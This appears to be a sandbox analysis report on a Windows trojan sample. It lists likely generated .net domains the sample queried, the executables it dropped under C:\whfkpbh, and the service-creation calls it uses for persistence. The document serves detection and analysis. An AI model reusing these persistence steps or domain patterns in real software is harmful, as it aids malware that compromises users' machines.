Source: global trafficDNS traffic detected: DNS query: memberquarter.net
Source: global trafficDNS traffic detected: DNS query: beginbranch.net
Source: global trafficDNS traffic detected: DNS query: knownbranch.net
Source: global trafficDNS traffic detected: DNS query: beginbelieve.net
Source: global trafficDNS traffic detected: DNS query: knownbelieve.net
Source: global trafficDNS traffic detected: DNS query: beginreceive.net
Source: global trafficDNS traffic detected: DNS query: knownreceive.net
Source: global trafficDNS traffic detected: DNS query: beginquarter.net
Source: global trafficDNS traffic detected: DNS query: knownquarter.net
Source: global trafficDNS traffic detected: DNS query: summerbranch.net
Source: global trafficDNS traffic detected: DNS query: crowdbranch.net
Source: global trafficDNS traffic detected: DNS query: summerbelieve.net
Source: global trafficDNS traffic detected: DNS query: crowdbelieve.net
Source: global trafficDNS traffic detected: DNS query: summerreceive.net
Source: global trafficDNS traffic detected: DNS query: crowdreceive.net
Source: global trafficDNS traffic detected: DNS query: summerquarter.net
Source: global trafficDNS traffic detected: DNS query: crowdquarter.net
Source: global trafficDNS traffic detected: DNS query: thoughtbranch.net
Source: global trafficDNS traffic detected: DNS query: waterbranch.net
Source: global trafficDNS traffic detected: DNS query: thoughtbelieve.net
Source: global trafficDNS traffic detected: DNS query: waterbelieve.net
Source: global trafficDNS traffic detected: DNS query: thoughtreceive.net
Source: global trafficDNS traffic detected: DNS query: waterreceive.net
Source: global trafficDNS traffic detected: DNS query: thoughtquarter.net
Source: global trafficDNS traffic detected: DNS query: waterquarter.net
Source: global trafficDNS traffic detected: DNS query: womanbranch.net
Source: global trafficDNS traffic detected: DNS query: smokebranch.net
Source: global trafficDNS traffic detected: DNS query: womanbelieve.net
Source: global trafficDNS traffic detected: DNS query: smokebelieve.net
Source: global trafficDNS traffic detected: DNS query: womanreceive.net
Source: global trafficDNS traffic detected: DNS query: smokereceive.net
Source: global trafficDNS traffic detected: DNS query: womanquarter.net
Source: global trafficDNS traffic detected: DNS query: smokequarter.net
Source: global trafficDNS traffic detected: DNS query: partybranch.net
Source: global trafficDNS traffic detected: DNS query: fightbranch.net
Source: global trafficDNS traffic detected: DNS query: partybelieve.net
Source: global trafficDNS traffic detected: DNS query: fightbelieve.net
Source: global trafficDNS traffic detected: DNS query: partyreceive.net
Source: global trafficDNS traffic detected: DNS query: fightreceive.net
Source: global trafficDNS traffic detected: DNS query: partyquarter.net
Source: global trafficDNS traffic detected: DNS query: fightquarter.net
Source: global trafficDNS traffic detected: DNS query: freshhonor.net
Source: global trafficDNS traffic detected: DNS query: experiencehonor.net
Source: global trafficDNS traffic detected: DNS query: freshneither.net
Source: global trafficDNS traffic detected: DNS query: experienceneither.net
Source: global trafficDNS traffic detected: DNS query: freshsystem.net
Source: global trafficDNS traffic detected: DNS query: experiencesystem.net
Source: global trafficDNS traffic detected: DNS query: freshtrust.net
Source: global trafficDNS traffic detected: DNS query: experiencetrust.net
Source: global trafficDNS traffic detected: DNS query: gentlemanhonor.net
Source: global trafficDNS traffic detected: DNS query: alreadyhonor.net
Source: global trafficDNS traffic detected: DNS query: gentlemanneither.net
Source: global trafficDNS traffic detected: DNS query: alreadyneither.net
Source: global trafficDNS traffic detected: DNS query: gentlemansystem.net
Source: global trafficDNS traffic detected: DNS query: alreadysystem.net
Source: global trafficDNS traffic detected: DNS query: gentlemantrust.net
Source: global trafficDNS traffic detected: DNS query: alreadytrust.net
Source: global trafficDNS traffic detected: DNS query: followhonor.net
Source: global trafficDNS traffic detected: DNS query: memberhonor.net
Source: global trafficDNS traffic detected: DNS query: followneither.net
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 05 Aug 2024 14:23:09 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Aug 2024 14:23:17 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 14:23:23 GMTServer: Apache/2.4.61 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fasthosts.co.uk/
Source: idtpqzltyfy.exe, 00000003.00000002.2069906189.0000000001F6D000.00000004.00000010.00020000.00000000.sdmp, idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://followfriend.net/index.php
Source: idtpqzltyfy.exe, 00000003.00000002.2069906189.0000000001F6D000.00000004.00000010.00020000.00000000.sdmp, idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_
Source: idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeFile created: C:\Windows\whfkpbh\Jump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeFile created: C:\Windows\whfkpbh\euwvjohdxkkjJump to behavior
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeFile created: C:\Windows\whfkpbh\euwvjohdxkkjJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeFile created: C:\Windows\whfkpbh\euwvjohdxkkjJump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exeFile created: C:\Windows\whfkpbh\euwvjohdxkkjJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeFile created: C:\Windows\whfkpbh\euwvjohdxkkjJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeFile created: C:\Windows\whfkpbh\euwvjohdxkkjJump to behavior
Source: C:\whfkpbh\amdrhfskpcu.exeFile created: C:\Windows\whfkpbh\euwvjohdxkkjJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeFile deleted: C:\Windows\whfkpbh\euwvjohdxkkjJump to behavior
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EC7A040_2_00EC7A04
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ED52000_2_00ED5200
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ED30F00_2_00ED30F0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EDA0A60_2_00EDA0A6
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EC14900_2_00EC1490
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE55E00_2_00EE55E0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EDE1C00_2_00EDE1C0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE0D800_2_00EE0D80
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EDF1600_2_00EDF160
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ECE5500_2_00ECE550
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EDA9300_2_00EDA930
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EF59300_2_00EF5930
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE66E70_2_00EE66E7
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE4EA00_2_00EE4EA0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE22A00_2_00EE22A0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EF0A900_2_00EF0A90
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE6A7B0_2_00EE6A7B
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EF02200_2_00EF0220
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ED97B00_2_00ED97B0
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ECD7600_2_00ECD760
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ECF3300_2_00ECF330
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EEE70B0_2_00EEE70B
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00EE9B000_2_00EE9B00
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009EA9302_2_009EA930
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009D7A042_2_009D7A04
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009E52002_2_009E5200
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F9B002_2_009F9B00
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009D14902_2_009D1490
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009EA0A62_2_009EA0A6
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009E30F02_2_009E30F0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F0D802_2_009F0D80
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009EE1C02_2_009EE1C0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F55E02_2_009F55E0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_00A059302_2_00A05930
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009DE5502_2_009DE550
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009EF1602_2_009EF160
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_00A00A902_2_00A00A90
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F4EA02_2_009F4EA0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F22A02_2_009F22A0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F66E72_2_009F66E7
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_00A002202_2_00A00220
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009F6A7B2_2_009F6A7B
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009E97B02_2_009E97B0
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009FE70B2_2_009FE70B
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009DF3302_2_009DF330
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009DD7602_2_009DD760
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0015A9303_2_0015A930
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00160D803_2_00160D80
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00147A043_2_00147A04
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001552003_2_00155200
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001622A03_2_001622A0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00169B003_2_00169B00
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001414903_2_00141490
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0015A0A63_2_0015A0A6
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001530F03_2_001530F0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001759303_2_00175930
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0014E5503_2_0014E550
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0015F1603_2_0015F160
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0015E1C03_2_0015E1C0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001655E03_2_001655E0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001702203_2_00170220
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00166A7B3_2_00166A7B
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00170A903_2_00170A90
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_00164EA03_2_00164EA0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001666E73_2_001666E7
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0016E70C3_2_0016E70C
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0014F3303_2_0014F330
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0014D7603_2_0014D760
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_001597B03_2_001597B0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A452005_2_00A45200
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A37A045_2_00A37A04
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A4A0A65_2_00A4A0A6
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A314905_2_00A31490
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A430F05_2_00A430F0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A50D805_2_00A50D80
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A555E05_2_00A555E0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A4E1C05_2_00A4E1C0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A4A9305_2_00A4A930
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A659305_2_00A65930
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A4F1605_2_00A4F160
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A3E5505_2_00A3E550
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A54EA05_2_00A54EA0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A522A05_2_00A522A0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A60A905_2_00A60A90
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A566E75_2_00A566E7
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A602205_2_00A60220
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A56A7B5_2_00A56A7B
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A497B05_2_00A497B0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A5E7265_2_00A5E726
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A3F3305_2_00A3F330
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A59B005_2_00A59B00
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A3D7605_2_00A3D760
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_00147A046_2_00147A04
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001552006_2_00155200
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001414906_2_00141490
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0015A0A66_2_0015A0A6
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001530F06_2_001530F0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0015A9306_2_0015A930
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001759306_2_00175930
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0014E5506_2_0014E550
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0015F1606_2_0015F160
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_00160D806_2_00160D80
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0015E1C06_2_0015E1C0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001655E06_2_001655E0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001702206_2_00170220
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_00166A7B6_2_00166A7B
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_00170A906_2_00170A90
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_00164EA06_2_00164EA0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001622A06_2_001622A0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001666E76_2_001666E7
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_00169B006_2_00169B00
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0016E70C6_2_0016E70C
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0014F3306_2_0014F330
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0014D7606_2_0014D760
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_001597B06_2_001597B0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0015A93011_2_0015A930
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00160D8011_2_00160D80
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00147A0411_2_00147A04
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0015520011_2_00155200
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_001622A011_2_001622A0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00169B0011_2_00169B00
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0014149011_2_00141490
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0015A0A611_2_0015A0A6
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_001530F011_2_001530F0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0017593011_2_00175930
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0014E55011_2_0014E550
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0015F16011_2_0015F160
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0015E1C011_2_0015E1C0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_001655E011_2_001655E0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0017022011_2_00170220
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00166A7B11_2_00166A7B
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00170A9011_2_00170A90
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_00164EA011_2_00164EA0
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_001666E711_2_001666E7
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0016E70C11_2_0016E70C
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0014F33011_2_0014F330
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0014D76011_2_0014D760
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_001597B011_2_001597B0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CD7A0412_2_00CD7A04
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CE520012_2_00CE5200
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CE30F012_2_00CE30F0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CD149012_2_00CD1490
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CEA0A612_2_00CEA0A6
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CEE1C012_2_00CEE1C0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF55E012_2_00CF55E0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF0D8012_2_00CF0D80
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CDE55012_2_00CDE550
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CEF16012_2_00CEF160
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00D0593012_2_00D05930
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CEA93012_2_00CEA930
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF66E712_2_00CF66E7
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00D00A9012_2_00D00A90
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF4EA012_2_00CF4EA0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF22A012_2_00CF22A0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF6A7B12_2_00CF6A7B
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00D0022012_2_00D00220
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CE97B012_2_00CE97B0
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CDD76012_2_00CDD760
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CFE70C12_2_00CFE70C
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CF9B0012_2_00CF9B00
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CDF33012_2_00CDF330
Source: mtuXDnH1Di.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal88.troj.winEXE@14/5@215/12
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00ED0500
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,2_2_009E0500
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,3_2_00150500
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,5_2_00A40500
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,6_2_00150500
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,11_2_00150500
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,12_2_00CE0500
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ED2120 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00ED2120
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ED0500 OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00ED0500
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeCode function: 0_2_00ECC660 StartServiceCtrlDispatcherA,0_2_00ECC660
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exeCode function: 2_2_009DC660 StartServiceCtrlDispatcherA,2_2_009DC660
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 3_2_0014C660 StartServiceCtrlDispatcherA,3_2_0014C660
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 5_2_00A3C660 StartServiceCtrlDispatcherA,5_2_00A3C660
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 6_2_0014C660 StartServiceCtrlDispatcherA,6_2_0014C660
Source: C:\whfkpbh\idtpqzltyfy.exeCode function: 11_2_0014C660 StartServiceCtrlDispatcherA,11_2_0014C660
Source: C:\whfkpbh\amdrhfskpcu.exeCode function: 12_2_00CDC660 StartServiceCtrlDispatcherA,12_2_00CDC660
Source: C:\whfkpbh\amdrhfskpcu.exeMutant created: NULL
Source: mtuXDnH1Di.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: mtuXDnH1Di.exeReversingLabs: Detection: 92%
Source: C:\Users\user\Desktop\mtuXDnH1Di.exeFile read: C:\Users\user\Desktop\mtuXDnH1Di.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\mtuXDnH1Di.exe "C:\Users\user\Desktop\mtuXDnH1Di.exe"
